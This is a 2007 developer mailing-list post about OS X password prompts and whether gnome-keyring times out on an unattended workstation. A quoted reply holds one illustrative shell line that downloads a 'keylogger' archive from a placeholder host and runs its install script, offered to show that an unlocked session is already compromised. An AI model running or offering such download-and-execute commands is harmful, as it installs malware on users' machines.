low-hanging fruit

Jesse Keating jkeating at redhat.com
Mon Aug 20 17:48:29 UTC 2007

On Mon, 20 Aug 2007 13:26:35 -0400
"Colin Walters" <walters at redhat.com> wrote:

> That is interesting; I honestly haven't used OS X at all.  Does OS X
> also have a password on your account by default, or did you have to
> explicitly set one?

That part is a bit fuzzy, but yes, I do believe when I created the user
I had to supply a password, and confirm it.  It may allow login without
password, but it would still prompt for the password whenever you
needed to do something "systemy".

> Does gnome-keyring have a sensible timeout?  If I left my workstation
> > for a period of time and forgot to enable the screensaver, can
> > anybody access my keyring contents, or cause something to be
> > authenticated via my keyring?
>

> Unrelated but - in my opinion gnome-keyring adds very little in terms
> of security to this scenario.
>
> wget http://my.favorite.keylogger.example.com/linux-x86.tgz && tar
> xzvf *.tgz && sh keylogger/install.sh

This was just more a general question.  OS X has a timeout on that
password prompt I think (or else they just ask it every time for every
new app).  I was thinking of how gnome-keyring could be used to manage
these prompts, but not if it is once unlocked always unlocked.

--
Jesse Keating